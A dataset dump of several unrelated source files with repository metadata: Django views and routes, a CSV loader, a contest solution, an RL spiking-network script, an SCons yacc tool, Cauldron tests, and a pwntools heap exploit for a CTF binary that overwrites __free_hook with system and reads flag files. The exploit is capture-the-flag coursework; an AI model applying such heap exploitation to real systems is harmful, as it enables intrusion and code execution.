def get(self, request, pk ,format=None):
user= self.get_user(pk)
serializer=UserSerializer(user)
return Response(serializer.data)
#updates a specific user
def put(self, request,pk, format=None):
user=self.get_user(pk)
serializer=UserSerializer(user,request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
#DELETES A user
def delete(self,request,pk,format=None):
user=self.get_user(pk)
user.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
#Index view
def index(request):
projects=Project.objects.order_by('-posted')
return render(request,'project/index.html',{'projects':projects})
#user profile
@login_required
def profile(request):
# profile = Profile.objects.create(user=request.user)
return render(request,'project/profile.html')
#specific project
@login_required
def project(request,project_id):
project=get_object_or_404(Project,pk=project_id)
votes=Votes()
votes_list=project.votes_set.all()
for vote in votes_list:
vote_mean=[]
usability=vote.usability
vote_mean.append(usability)
content=vote.content
vote_mean.append(content)
design=vote.design
vote_mean.append(design)
mean=np.mean(vote_mean)
mean=round(mean,2)
if mean:
return render(request, 'project/project.html',{'project':project,'votes':votes,'votes_list':votes_list,'mean':mean})
return render(request, 'project/project.html',{'project':project,'votes':votes,'votes_list':votes_list})
@login_required
def new_project(request):
current_user=request.user
if request.method=='POST':
form=PostProject(request.POST,request.FILES)
if form.is_valid():
project=form.save(commit=False)
project.user=current_user
project.save()
return redirect('project:project_index')
else:
form=PostProject()
return render(request,'project/new_project.html',{'form':form})
@login_required
def posted_by(request, user_id):
user=get_object_or_404(User,pk=user_id)
return render(request,'project/posted_by.html', {'user':user})
@login_required
def vote(request, project_id):
project=get_object_or_404(Project, pk=project_id)
votes=Votes()
votes=Votes(request.POST)
if votes.is_valid():
vote=votes.save(commit=False)
vote.user=request.user
vote.project=project
vote.save()
messages.success(request,'Votes Successfully submitted')
return HttpResponseRedirect(reverse('project:project', args=(project.id,)))
else:
messages.warning(request,'ERROR! Voting Range is from 0-10')
votes=Votes()
return render(request, 'project/project.html',{'project':project,'votes':votes})
def update_settings(request):
update_user=UpdateUser(request.POST,instance=request.user)
update_profile=UpdateProfile(request.POST,request.FILES,instance=request.user.profile)
if update_user.is_valid() and update_profile.is_valid():
update_user.save()
update_profile.save()
messages.success(request, 'Profile Updated Successfully')
return redirect('project:profile')
else:
update_user=UpdateUser(instance=request.user)
update_profile=UpdateProfile(instance=request.user.profile)
return render(request, 'project/update_profile.html',{'update_user':update_user,'update_profile':update_profile})
#API PAGE
def api(request):
return render(request,'project/api.html')
| James19stack/awards | project/views.py | views.py | py | 6,462 | python | en | code | 0 | github-code | 90 |
23470978741 | import csv
f = open('/Users/cdelbasso/Desktop/SPD4FX.csv', 'r')
reader = csv.reader(f)
spd = {}
for row in reader:
spd[row[0]] = {'Italian':row[1], 'Croatian':row[2], 'English':row[3]}
| spirito123/SanPierinDictionary | SPD.py | SPD.py | py | 193 | python | en | code | 0 | github-code | 90 |
42716613329 | from django.contrib import admin
from django.urls import path
from student import views
urlpatterns = [
path('/Signout',views.signout),
path('/dashboard', views.index),
path('/Signup',views.signup),
path('/Login', views.Signin, name="login"),
path('/Register',views.register),
# path('/dashboard/StudentProfile',views.ShowProfile),
path('activate/(?P<uidb64>[0-9A-Za-z_\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/', views.activate, name='activate'),
]
| Prathm-s/PlacementMangementSystem | student/urls.py | urls.py | py | 493 | python | en | code | 0 | github-code | 90 |
18309858739 | import sys
def solve():
input = sys.stdin.readline
N = int(input())
S = input().strip("\n")
Left = [set() for _ in range(N)]
Right = [set() for _ in range(N)]
Left[0] |= {S[0]}
Right[N-1] |= {S[N-1]}
for i in range(1, N):
Left[i] = Left[i-1] | {S[i]}
Right[N-i-1] = Right[N-i] | {S[N-i-1]}
used = set()
for i in range(1, N - 1):
mid = S[i]
for l in Left[i-1]:
for r in Right[i+1]:
used |= {l + mid + r}
print(len(used))
return 0
if __name__ == "__main__":
solve() | Aasthaengg/IBMdataset | Python_codes/p02844/s455333574.py | s455333574.py | py | 578 | python | en | code | 0 | github-code | 90 |
70219890857 | from pwn import *
HOST, PORT = 'edu-ctf.zoolab.org', 30211
if args.HOST: HOST = args.HOST
if args.PORT: PORT = args.PORT
exe = context.binary = ELF('./easyheap/share/easyheap')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if args.REMOTE:
io = remote(HOST,PORT)
else:
env = {}
io = process(exe.path)
pause()
def menu(opt):
io.sendlineafter(b'> ', str(opt).encode())
def recv():
return io.readuntil(b'--- happy bookstore ---', drop=True)
size = 0
def add(sz, name, price = 0):
global size
menu(1)
io.sendlineafter(b':', str(size).encode())
size += 1
io.sendlineafter(b':', str(sz).encode())
io.sendafter(b':', name)
io.sendlineafter(b':', str(price).encode())
def delete(idx):
menu(2)
io.sendlineafter(b':', str(idx).encode())
def edit(idx, name, price = 0):
menu(3)
io.sendlineafter(b':', str(idx).encode())
io.sendafter(b':', name)
io.sendlineafter(b':', str(price).encode())
def show():
menu(4)
res = recv()
res = res.split(b'--------------------')
books = []
for line in res:
if line:
line = line.split(b'Index:\t')[1]
idx,line = line.split(b'\nName:\t')
name,line = line.split(b'\nPrice:\t')
price = line[:-1]
book = (idx,name,price)
books.append(book)
return books
def find(idx):
menu(5)
io.sendlineafter(b':', str(idx).encode())
io.readuntil(b': ')
return recv()[:-1]
sz = 8
for i in range(sz):
add(0xb0, b'sh\n')
for i in reversed(range(sz)):
delete(i)
heap_base = int(show()[1][0]) - 0x10
info(f'heap base: {hex(heap_base)}')
add(0x100, b'sh\n')
add(0x20, p64(heap_base + 0x2d0))
libc.address = u64(find(3).ljust(8, b'\0')) - 0x1ebc90
info(f'libc base: {hex(libc.address)}')
edit(9, p64(libc.sym['__free_hook']))
edit(3, p64(libc.sym['system']))
delete(1)
if not args.REMOTE:
io.interactive()
else:
io.clean(1)
io.sendline(b'cat /home/`whoami`/flag*')
flag = io.readuntil(b'}').strip().decode()
success(flag)
| nella17/NYCU-Secure-Programming-2021 | Pwn/HW-2/easyheap/exploit.py | exploit.py | py | 2,050 | python | en | code | 3 | github-code | 90 |
4295970182 | # +
import requests
HEADERS = {
"Accept": 'application/json',
}
BASE_URL = "https://data.brreg.no/enhetsregisteret/api/"
def get_json(url, params={}):
url = BASE_URL + url
req = requests.Request("GET", url=url, headers=HEADERS, params=params)
#print(req.url, req.headers, req.params)
print("Full URL, check during testing:", req.prepare().url)
response = requests.Session().send(req.prepare())
response.raise_for_status()
# print(response.text)
return response.json()
get_json("enheter")["_embedded"]
# -
| statisticsnorway/speshelse | experimental/brreg_api_test.py | brreg_api_test.py | py | 553 | python | en | code | 0 | github-code | 90 |
2354928047 | import numpy as np
from place import Place
from transition import Transition
from scheduler import BLOCKED, FINISHED
BEGINNING = 0
END = 1
ANYWHERE = -1
class Conveyor:
def __init__(self, name, capacity, delay=0, exitPredicateFn = lambda p: True):
self.capacity = capacity
self.delayFn = lambda: delay
self.exitPredicateFn = exitPredicateFn
self.name = name
self.enabled = True
self.places = []
self.transitions = []
self.make()
def make(self):
def conveyorTransitionFn(inputPlaces, outputPlaces, currentTime, phase):
if len(outputPlaces) == 0:
return FINISHED
if self.IsStopped():
return FINISHED
outputPlace = outputPlaces[0]
if outputPlace.IsDisabled():
return FINISHED
inputPlace = inputPlaces[0]
if not outputPlace.IsFull() :
if not inputPlace.IsEmpty():
v = inputPlace.Remove()
outputPlace.Add(v)
return FINISHED
else:
return BLOCKED
def lastTransitionFn(inputPlaces, outputPlaces, currentTime, phase):
# the last transition is not moving the item to the output place
# if the exitPredicateFn returns false
# this is used to model the A-Frame behavior
inputPlace = inputPlaces[0]
if not inputPlace.IsEmpty():
v = inputPlace[0]
if not self.exitPredicateFn(v):
return FINISHED
return conveyorTransitionFn(inputPlaces, outputPlaces, currentTime, phase)
prevTransition = None
for _ in range(self.capacity):
newPlace = Place(capacity=1)
newTransition = Transition(self.delayFn, conveyorTransitionFn)
self.places.append(newPlace)
self.transitions.append(newTransition)
newTransition.AddInputPlace(newPlace)
if prevTransition is not None:
prevTransition.AddOutputPlace(newPlace)
prevTransition = newTransition
#the last transition has augmented transition action
self.transitions[-1].SetActionFn(lastTransitionFn)
def Connect(self, nextPlace):
_, countOutputPlaces = self.transitions[-1].CountPlaces()
if countOutputPlaces > 0:
raise Exception(f"The conveyor {self.name} is already connected")
self.transitions[-1].AddOutputPlace(nextPlace)
def ScheduleTransitions(self, scheduler, t):
for i in range(len(self.transitions)-1, -1, -1):
if self.transitions[i].IsEnabled():
self.transitions[i].ScheduleExecute(scheduler, t)
def State(self):
cntFull = 0.0
for p in self.places:
if p.IsFull():
cntFull += 1
return cntFull / self.capacity
def DeepState(self):
state = np.asarray([0 if p.IsEmpty() else p[0].Id() for p in self.places])
return state
def Capacity(self):
return self.capacity
def FirstPlace(self):
return self.places[0]
def Places(self):
return self.places
def Stop(self):
self.enabled = False
self.places[0].Disable()
def Start(self):
self.enabled = True
self.places[0].Enable()
def IsStopped(self):
return self.enabled == False
def Reset(self):
for place in self.places:
if len(place) > 0:
place.Remove()
for transition in self.transitions:
transition.Reset()
self.Start()
def Transitions(self):
return self.transitions
def __str__(self):
s = f'{self.name}:'
for place in self.places:
s += f' {place}'
return s
if __name__ == "__main__":
from scheduler import Scheduler
scheduler = Scheduler()
c = Conveyor("c1", 10, 0)
c2 = Conveyor("c2", 10, 0)
c.Connect(c2.FirstPlace())
c2.Stop()
c.PutValue('A')
print(c)
for t in range(25):
if t == 22:
c2.Start()
scheduler.Execute(t)
c.ScheduleTransitions(scheduler, t)
c2.ScheduleTransitions(scheduler, t)
scheduler.Execute(t)
print(t, c, c2)
| vparonov/rlwh | conveyor.py | conveyor.py | py | 4,493 | python | en | code | 0 | github-code | 90 |
71823058538 |
class Scheduler():
def __init__(self, optimizer, lr, decay=0.3, lr_decay_epoch=100):
"""
Args:
optimizer: optimizer to scheduler the parameters
lr: initial learning rate
decay: decay rate
lr_decay_epoch: epoch each learning rate decay
"""
self.optimizer = optimizer
self.lr = lr
self.decay = decay
self.lr_decay_epoch = lr_decay_epoch
def step(self, epoch):
lr = self.lr * self.decay ** int(epoch / self.lr_decay_epoch)
if epoch % 10 == 0 and epoch > 0:
for param_group in self.optimizer.param_groups:
param_group['lr'] = lr
return self.optimizer | haohq19/snn-assessment | tools/optimizer.py | optimizer.py | py | 714 | python | en | code | 0 | github-code | 90 |
42940227572 | """Modul obsahující funkce týkající se Komens zpráv."""
from __future__ import annotations
from datetime import datetime
from typing import cast
from bs4 import BeautifulSoup
from bs4.element import Tag # Kvůli mypy - https://github.com/python/mypy/issues/10826
from ..bakalari import BakalariAPI, Endpoint, _register_parser, _register_resolver
from ..exceptions import MissingElementError
from ..looting import GetterOutput, ResultSet
from ..objects import Komens, KomensFile, UnresolvedID
from ..sessions import RequestsSession
from ..utils import parseHTML
def getter_komens_ids(
bakalariAPI: BakalariAPI,
from_date: datetime | None = None,
to_date: datetime | None = None,
) -> GetterOutput[BeautifulSoup]:
"""Získá IDčka daných Komens zpráv.
Kvůli limitaci Bakalářů je možné načíst pouze 300 zpráv na jednou.
"""
target = bakalariAPI.get_endpoint(Endpoint.KOMENS)
if from_date is not None or to_date is not None:
target += "?s=custom"
if from_date is not None:
target += "&from=" + from_date.strftime("%d%m%Y")
if to_date is not None:
target += "&to=" + to_date.strftime("%d%m%Y")
with bakalariAPI.session_manager.get_session_or_create(RequestsSession) as session:
response = session.get(target)
return GetterOutput(Endpoint.KOMENS, parseHTML(response.content))
def getter_info(
bakalariAPI: BakalariAPI, ID: str, context: str = "prijate"
) -> GetterOutput[dict]:
with bakalariAPI.session_manager.get_session_or_create(RequestsSession) as session:
response = session.post(
bakalariAPI.get_endpoint(Endpoint.KOMENS_GET),
json={"idmsg": ID, "context": context},
).json()
return GetterOutput(Endpoint.KOMENS_GET, response)
@_register_parser(Endpoint.KOMENS, BeautifulSoup)
def parser_main(getter_output: GetterOutput[BeautifulSoup]) -> ResultSet:
output = ResultSet()
# None-aware je deferred... Sadge
# komens_list = getter_output.data.find(id="message_list_content")?.find("ul")?.find_all("li", recursive=False)
x = getter_output.data.find(id="message_list_content")
if x is None:
raise MissingElementError('find(id="message_list_content")')
x = cast(Tag, x.find("ul"))
if x is None:
raise MissingElementError('find(id="message_list_content").find("ul")')
# `cast()` protože `find()` může najít i NavigableString, který ale nemá `find_all()` (teda ho nemůžeme volat)...
komens_list = cast(list[Tag], x("li", recursive=False))
for komens in komens_list:
table = cast(Tag, komens.find("table"))
if table is None:
raise MissingElementError('komens.find("table")')
# `cast()` na string, protože atribut může být i multivalued (=> list), což by ale u "data-idmsg" hrozit nemělo
output.add_loot(UnresolvedID(cast(str, table["data-idmsg"]), Komens))
return output
@_register_parser(Endpoint.KOMENS_GET, dict)
def parser_info(getter_output: GetterOutput[dict]) -> ResultSet:
jsn = getter_output.data
output = ResultSet()
if len(jsn["Files"]) != 0:
for soubor in jsn["Files"]:
komens_file = KomensFile(
soubor["id"],
soubor["name"],
soubor["Size"],
soubor["type"],
soubor["idmsg"],
soubor["path"],
)
output.add_loot(komens_file)
return output.add_loot(
Komens(
jsn["Id"],
jsn["Jmeno"],
jsn["MessageText"],
datetime.strptime(jsn["Cas"], "%d.%m.%Y %H:%M"),
jsn["MohuPotvrdit"],
jsn["Potvrzeno"],
jsn["Kind"],
output.get(KomensFile),
)
)
@_register_resolver(Komens)
def resolver(bakalariAPI: BakalariAPI, unresolved: UnresolvedID) -> Komens:
return parser_info(getter_info(bakalariAPI, unresolved.ID)).get(Komens)[0]
| Hackrrr/BakalariAPI | src/bakalariapi/modules/komens.py | komens.py | py | 3,992 | python | en | code | 4 | github-code | 90 |
42008616083 | __revision__ = "src/engine/SCons/Tool/yacc.py 5134 2010/08/16 23:02:40 bdeegan"
import os.path
import SCons.Defaults
import SCons.Tool
import SCons.Util
YaccAction = SCons.Action.Action("$YACCCOM", "$YACCCOMSTR")
def _yaccEmitter(target, source, env, ysuf, hsuf):
yaccflags = env.subst("$YACCFLAGS", target=target, source=source)
flags = SCons.Util.CLVar(yaccflags)
targetBase, targetExt = os.path.splitext(SCons.Util.to_String(target[0]))
if '.ym' in ysuf: # If using Objective-C
target = [targetBase + ".m"] # the extension is ".m".
# If -d is specified on the command line, yacc will emit a .h
# or .hpp file with the same name as the .c or .cpp output file.
if '-d' in flags:
target.append(targetBase + env.subst(hsuf, target=target, source=source))
# If -g is specified on the command line, yacc will emit a .vcg
# file with the same base name as the .y, .yacc, .ym or .yy file.
if "-g" in flags:
base, ext = os.path.splitext(SCons.Util.to_String(source[0]))
target.append(base + env.subst("$YACCVCGFILESUFFIX"))
# With --defines and --graph, the name of the file is totally defined
# in the options.
fileGenOptions = ["--defines=", "--graph="]
for option in flags:
for fileGenOption in fileGenOptions:
l = len(fileGenOption)
if option[:l] == fileGenOption:
# A file generating option is present, so add the file
# name to the list of targets.
fileName = option[l:].strip()
target.append(fileName)
return (target, source)
def yEmitter(target, source, env):
return _yaccEmitter(target, source, env, ['.y', '.yacc'], '$YACCHFILESUFFIX')
def ymEmitter(target, source, env):
return _yaccEmitter(target, source, env, ['.ym'], '$YACCHFILESUFFIX')
def yyEmitter(target, source, env):
return _yaccEmitter(target, source, env, ['.yy'], '$YACCHXXFILESUFFIX')
def generate(env):
"""Add Builders and construction variables for yacc to an Environment."""
c_file, cxx_file = SCons.Tool.createCFileBuilders(env)
# C
c_file.add_action('.y', YaccAction)
c_file.add_emitter('.y', yEmitter)
c_file.add_action('.yacc', YaccAction)
c_file.add_emitter('.yacc', yEmitter)
# Objective-C
c_file.add_action('.ym', YaccAction)
c_file.add_emitter('.ym', ymEmitter)
# C++
cxx_file.add_action('.yy', YaccAction)
cxx_file.add_emitter('.yy', yyEmitter)
env['YACC'] = env.Detect('bison') or 'yacc'
env['YACCFLAGS'] = SCons.Util.CLVar('')
env['YACCCOM'] = '$YACC $YACCFLAGS -o $TARGET $SOURCES'
env['YACCHFILESUFFIX'] = '.h'
# Apparently, OS X now creates file.hpp like everybody else
# I have no idea when it changed; it was fixed in 10.4
#if env['PLATFORM'] == 'darwin':
# # Bison on Mac OS X just appends ".h" to the generated target .cc
# # or .cpp file name. Hooray for delayed expansion of variables.
# env['YACCHXXFILESUFFIX'] = '${TARGET.suffix}.h'
#else:
# env['YACCHXXFILESUFFIX'] = '.hpp'
env['YACCHXXFILESUFFIX'] = '.hpp'
env['YACCVCGFILESUFFIX'] = '.vcg'
def exists(env):
return env.Detect(['bison', 'yacc'])
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| cloudant/bigcouch | couchjs/scons/scons-local-2.0.1/SCons/Tool/yacc.py | yacc.py | py | 3,371 | python | en | code | 570 | github-code | 90 |
14641021383 | #!/usr/bin/env python
# _*_ coding:utf-8 _*_
'''
随机生成1000个点,选取任意3个点组成三角形,问,如何判断其余的997个点在三角形内或外?
'''
import numpy as np
import random
# 定义点
class Vertex(object):
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return ("x坐标:%s,y坐标:%s" % (self.x, self.y))
# "Freind : %s" %self.name 返回多个参数啊
# 定义三角形
class Triangle(object):
def __init__(self, A, B, C):
self.A = A
self.B = B
self.C = C
def __str__(self):
return ("A点:%s B点:%s C点:%s" % (self.A, self.B, self.C))
# 判断构建的三角形是否满足三角形条件,即面积是否为零
def isTriangle(self):
arr = np.array([[self.A.x, self.A.y, 1], [self.B.x, self.B.y, 1], [self.C.x, self.C.y, 1]])
s = abs(0.5 * np.linalg.det(arr))
return False if s == 0 else True
# 判断一个点是否在三角形内,即该点与三角形任意两点构成的面积不为0且面积和为外部大三角形面积之和
def isInTriangle(self, D):
arr1 = np.array([[self.A.x, self.A.y, 1], [self.B.x, self.B.y, 1], [self.C.x, self.C.y, 1]])
sumAera = 0.5 * np.linalg.det(arr1)
arr2 = np.array([[self.A.x, self.A.y, 1], [self.B.x, self.B.y, 1], [D.x, D.y, 1]])
s1 = 0.5 * np.linalg.det(arr2)
arr3 = np.array([[self.A.x, self.A.y, 1], [D.x, D.y, 1], [self.C.x, self.C.y, 1]])
s2 = 0.5 * np.linalg.det(arr3)
arr4 = np.array([[D.x, D.y, 1], [self.B.x, self.B.y, 1], [self.C.x, self.C.y, 1]])
s3 = 0.5 * np.linalg.det(arr4)
if s1 != 0 and s2 != 0 and s3 != 0 and abs(s1 + s2 + s3 - sumAera) < 0.000001:
return True
else:
return False
if __name__ == '__main__':
# 产生1000个点且存储起来
arrOfVertex = []
for i in range(1000):
tempx = random.randint(1, 100)
tempy = random.randint(1, 100)
tempVertex = Vertex(tempx, tempy)
arrOfVertex.append(tempVertex)
# 在这1000个点中随机选取3个点且保证这三个点构成一个三角形
k, j, m = random.randint(0, 999), random.randint(0, 999), random.randint(0, 999)
selectedTriangle = Triangle(arrOfVertex[k], arrOfVertex[j], arrOfVertex[m])
while not selectedTriangle.isTriangle():
k, j, m = random.randint(0, 999), random.randint(0, 999), random.randint(0, 999)
selectedTriangle = Triangle(arrOfVertex[k], arrOfVertex[j], arrOfVertex[m])
# 判断点是否在三角形中,且用一个数组存储起来
arrOfJudge = []
sum = 0
for i in range(1000):
temp = selectedTriangle.isInTriangle(arrOfVertex[i])
print(arrOfVertex[i], end=" ")
if temp: sum += 1
arrOfJudge.append(temp)
print("选取的是否为三角形:%s" % selectedTriangle.isTriangle())
print(arrOfJudge)
print("在三角形内部的比例为:%s %%" % (sum / 10))
# a = Vertex(1, 1)
# b = Vertex(2, 2)
# c = Vertex(3, 3)
# print(a)
# tri = Triangle(a, b, c)
# print(tri)
# print(tri.isTriangle())
| ares5221/Data-Structures-and-Algorithms | 09概率组合数学/02RandomPos/判断点是否在三角形内部.py | 判断点是否在三角形内部.py | py | 3,172 | python | en | code | 1 | github-code | 90 |
9779190700 | #!/usr/bin/python
import zipfile
import io
import urllib.request
import json
import zipfile
import shutil
def getZipData(url):
result = urllib.request.urlopen(url)
return result.read()
url = 'https://raw.githubusercontent.com/VirtoCommerce/vc-modules/master/modules_v3.json'
response = urllib.request.urlopen(url)
modules = json.load(response)
for module in modules:
if module["Groups"]:
if 'commerce' in map(lambda x:x.lower(), module["Groups"]):
moduleId = module["Id"]
destinationPath = moduleId
for version in module["Versions"]:
if version["VersionTag"] in ["", "preview"]:
packageUrl = version["PackageUrl"]
zipData = getZipData(packageUrl)
zipRef = zipfile.ZipFile(io.BytesIO(zipData))
zipRef.extractall(destinationPath)
print(moduleId, 'installed')
| VirtoCommerce/vc-module-training-docker | src/VirtoCommerce.TrainingModule.Web/InstallLatestModules.py | InstallLatestModules.py | py | 935 | python | en | code | 5 | github-code | 90 |
29571909426 | # Parts of this code were adapted from the pytorch example at
# https://github.com/pytorch/examples/blob/master/reinforcement_learning/reinforce.py
# which is licensed under the license found in LICENSE.
import os
import random
# pytype: disable=import-error
import gym
import numpy as np
import torch
from absl import app
from absl import flags
from absl import logging
from norse.torch.functional.lif import LIFParameters
from norse.torch.module.encode import ConstantCurrentLIFEncoder
from norse.torch.module.leaky_integrator import LILinearCell
from norse.torch.module.lif import LIFRecurrentCell
from concurrent.futures import ThreadPoolExecutor
# pytype: enable=import-error
FLAGS = flags.FLAGS
flags.DEFINE_enum("device", "cpu", ["cpu", "cuda"], "Device to use by pytorch.")
flags.DEFINE_integer("episodes", 1000, "Number of training trials.")
flags.DEFINE_float("learning_rate", 0.001, "Learning rate to use.")
flags.DEFINE_float("gamma", 0.99, "discount factor to use")
flags.DEFINE_integer("log_interval", 10, "In which intervals to display learning progress.")
flags.DEFINE_enum("model", "super", ["super"], "Model to use for training.")
flags.DEFINE_enum("policy", "snn", ["snn", "ann"], "Select policy to use.")
flags.DEFINE_boolean("render", False, "Render the environment")
flags.DEFINE_string("environment", "CartPole-v1", "Gym environment to use.")
flags.DEFINE_integer("random_seed", 9998, "Random seed to use")
class ANNPolicy(torch.nn.Module):
"""
Typical ANN policy with state and action space for cartpole defined. The 2 layer network is fully connected
and has 128 neurons per layer. Uses ReLu activation and softmax final activation.
"""
def __init__(self, *args, **kwargs):
super(ANNPolicy, self).__init__()
self.state_space = kwargs.pop('state_space')
self.action_space = kwargs.pop('action_space')
self.l1 = torch.nn.Linear(self.state_space, 128, bias=False)
self.l2 = torch.nn.Linear(128, self.action_space, bias=False)
self.dropout = torch.nn.Dropout(p=0.6)
self.saved_log_probs = []
self.rewards = []
def forward(self, x):
x = self.l1(x)
x = self.dropout(x)
x = torch.nn.functional.relu(x)
x = self.l2(x)
x = torch.nn.functional.softmax(x, dim=1)
return x
class SNNPolicy(torch.nn.Module):
"""
SNN policy.
"""
def __init__(self, *args, **kwargs):
super(SNNPolicy, self).__init__()
self.state_dim = kwargs.pop('state_space')
self.input_features = 16
self.hidden_features = 128
self.output_features = kwargs.pop('action_space')
self.constant_current_encoder = ConstantCurrentLIFEncoder(40)
self.lif = LIFRecurrentCell(2 * self.state_dim, self.hidden_features, p=LIFParameters(method="super", alpha=100.0))
self.dropout = torch.nn.Dropout(p=0.5)
self.readout = LILinearCell(self.hidden_features, self.output_features)
self.saved_log_probs = []
self.rewards = []
def forward(self, x):
scale = 50
x_pos = self.constant_current_encoder(torch.nn.functional.relu(scale * x))
x_neg = self.constant_current_encoder(torch.nn.functional.relu(-scale * x))
x = torch.cat([x_pos, x_neg], dim=2)
seq_length, batch_size, _ = x.shape
voltages = torch.zeros(
seq_length, batch_size, self.output_features, device=x.device
)
s1 = so = None
# sequential integration loop
for ts in range(seq_length):
z1, s1 = self.lif(x[ts, :, :], s1)
z1 = self.dropout(z1)
vo, so = self.readout(z1, so)
voltages[ts, :, :] = vo
# tmp_fn = lambda in_1: lambda in_2: lambda in_3: self.parallel_integration_worker(in_1, in_2, in_3)
# with ThreadPoolExecutor(max_workers=4) as executor:
# tmp_fn = tmp_fn(x)
# tmp_fn = tmp_fn(voltages)
# executor.map(tmp_fn, range(seq_length))
m, _ = torch.max(voltages, 0)
p_y = torch.nn.functional.softmax(m, dim=1)
return p_y
def parallel_integration_worker(self, x, voltages, ts):
s1 = so = None
z1, s1 = self.lif(x[ts, :, :], s1)
z1 = self.dropout(z1)
vo, so = self.readout(z1, so)
voltages[ts, :, :] = vo
return None
def select_action(state, policy, device):
state = torch.from_numpy(state).float().unsqueeze(0).to(device)
probs = policy(state)
m = torch.distributions.Categorical(probs)
action = m.sample()
policy.saved_log_probs.append(m.log_prob(action))
return action.item(), probs
def finish_episode(policy, optimizer):
eps = np.finfo(np.float32).eps.item()
R = 0
policy_loss = []
returns = []
for r in policy.rewards[::-1]:
R = r + FLAGS.gamma * R
returns.insert(0, R)
returns = torch.as_tensor(returns)
returns = (returns - returns.mean()) / (returns.std() + eps)
for log_prob, R in zip(policy.saved_log_probs, returns):
policy_loss.append(-log_prob * R)
optimizer.zero_grad()
policy_loss = torch.cat(policy_loss).sum()
policy_loss.backward()
optimizer.step()
del policy.rewards[:]
del policy.saved_log_probs[:]
return policy_loss
def main(args):
t = 0
running_reward = 10
torch.manual_seed(FLAGS.random_seed)
random.seed(FLAGS.random_seed)
label = f"{FLAGS.policy}-{FLAGS.model}-{FLAGS.random_seed}"
os.makedirs(f"runs/{FLAGS.environment}/{label}", exist_ok=True)
os.chdir(f"runs/{FLAGS.environment}/{label}")
FLAGS.append_flags_into_file("flags.txt")
np.random.seed(FLAGS.random_seed)
if torch.cuda.is_available():
torch.cuda.manual_seed(FLAGS.random_seed)
device = torch.device(FLAGS.device)
env = gym.make(FLAGS.environment)
env.reset()
env.seed(FLAGS.random_seed)
env_state_space = env.observation_space.shape[0]
env_action_space = env.action_space.n
policy = None # Variable initialization
if FLAGS.policy == "ann":
policy = ANNPolicy(state_space=env_state_space, action_space=env_action_space).to(device)
elif FLAGS.policy == "snn":
policy = SNNPolicy(state_space=env_state_space, action_space=env_action_space).to(device)
else:
raise NotImplementedError
optimizer = torch.optim.Adam(policy.parameters(), lr=FLAGS.learning_rate)
running_rewards = []
episode_rewards = []
episode_losses = []
for e in range(FLAGS.episodes):
state, ep_reward = env.reset(), 0
time_steps_max = env._max_episode_steps # Default was 10000
for t in range(1, time_steps_max): # Don't infinite loop while learning
action, _ = select_action(state, policy, device=device)
state, reward, done, _ = env.step(action)
if FLAGS.render:
env.render()
policy.rewards.append(reward)
ep_reward += reward
if done:
break
running_reward = 0.05 * ep_reward + (1 - 0.05) * running_reward
episode_loss = finish_episode(policy, optimizer)
if e % FLAGS.log_interval == 0:
# logging.info(
# "Episode {}/{} \tLast reward: {:.2f}\tAverage reward: {:.2f}".format(
# e, FLAGS.episodes, ep_reward, running_reward
# )
logging.info(
"Episode {}/{} \tLast reward: {:.2f}\tAverage reward: {:.2f}\tLoss: {:.2f}".format(
e, FLAGS.episodes, ep_reward, running_reward, episode_loss
)
)
episode_rewards.append(ep_reward)
running_rewards.append(running_reward)
episode_losses.append(episode_loss)
# if running_reward > env.spec.reward_threshold:
# logging.info(
# "Solved! Running reward is now {} and "
# "the last episode runs to {} time steps!".format(running_reward, t)
# )
# break
np.save("running_rewards.npy", np.array(running_rewards))
np.save("episode_rewards.npy", np.array(episode_rewards))
np.save("episode_losses.npy", np.array(episode_rewards))
torch.save(optimizer.state_dict(), "optimizer.pt")
torch.save(policy.state_dict(), "policy.pt")
if __name__ == "__main__":
app.run(main)
| Surya-77/rl-snn-norse | reinforce.py | reinforce.py | py | 8,395 | python | en | code | 0 | github-code | 90 |
5011453605 | import os
from datetime import datetime
from unittest.mock import MagicMock
from unittest.mock import PropertyMock
from unittest.mock import patch
import cauldron as cd
from cauldron.session import exposed
from cauldron.test import support
from cauldron.test.support import scaffolds
ROOT = 'cauldron.session.exposed'
class TestExposed(scaffolds.ResultsTest):
"""Test suite for the exposed module"""
def test_no_project_defaults(self):
"""Expected defaults when no project exists"""
ep = exposed.ExposedProject()
self.assertIsNone(ep.display)
self.assertIsNone(ep.shared)
self.assertIsNone(ep.settings)
self.assertIsNone(ep.title)
self.assertIsNone(ep.id)
self.assertIsNone(ep.path())
with self.assertRaises(RuntimeError):
ep.title = 'Some Title'
@patch('{}.ExposedStep._step'.format(ROOT), new_callable=PropertyMock)
def test_step_properties(self, _step: PropertyMock):
"""Should return values from the internal _step object."""
now = datetime.utcnow()
_step.return_value = MagicMock(
start_time=now,
end_time=now,
elapsed_time=0,
is_visible=True
)
es = exposed.ExposedStep()
self.assertEqual(now, es.start_time)
self.assertEqual(now, es.end_time)
self.assertEqual(0, es.elapsed_time)
@patch('{}.ExposedStep._step'.format(ROOT), new_callable=PropertyMock)
def test_step_visibility(self, _step: PropertyMock):
"""Should return values from the internal _step object."""
_step.return_value = MagicMock(is_visible=True)
es = exposed.ExposedStep()
self.assertTrue(es.visible)
es.visible = False
self.assertFalse(es.visible)
@patch('{}.ExposedStep._step'.format(ROOT), new_callable=PropertyMock)
def test_step_stop_aborted(self, _step: PropertyMock):
"""
Should abort stopping and not raise an error when no internal step
is available to stop.
"""
_step.return_value = None
es = exposed.ExposedStep()
es.stop()
@patch('cauldron.session.exposed.ExposedProject.get_internal_project')
def test_project_stop_aborted(self, get_internal_project: MagicMock):
"""
Should abort stopping and not raise an error when no internal project
is available to stop.
"""
get_internal_project.return_value = None
ep = exposed.ExposedProject()
ep.stop()
def test_change_title(self):
"""Title should change through exposed project."""
test_title = 'Some Title'
support.create_project(self, 'igor')
cd.project.title = test_title
self.assertEqual(cd.project.title, test_title)
def test_no_step_defaults(self):
"""Exposed step should apply defaults without project."""
es = exposed.ExposedStep()
self.assertIsNone(es._step)
def test_stop_step_and_halt(self):
"""
Should stop the step early and not continue running future steps
"""
support.create_project(self, 'homer')
support.add_step(self, contents='\n'.join([
'import cauldron as cd',
'cd.shared.test = 0',
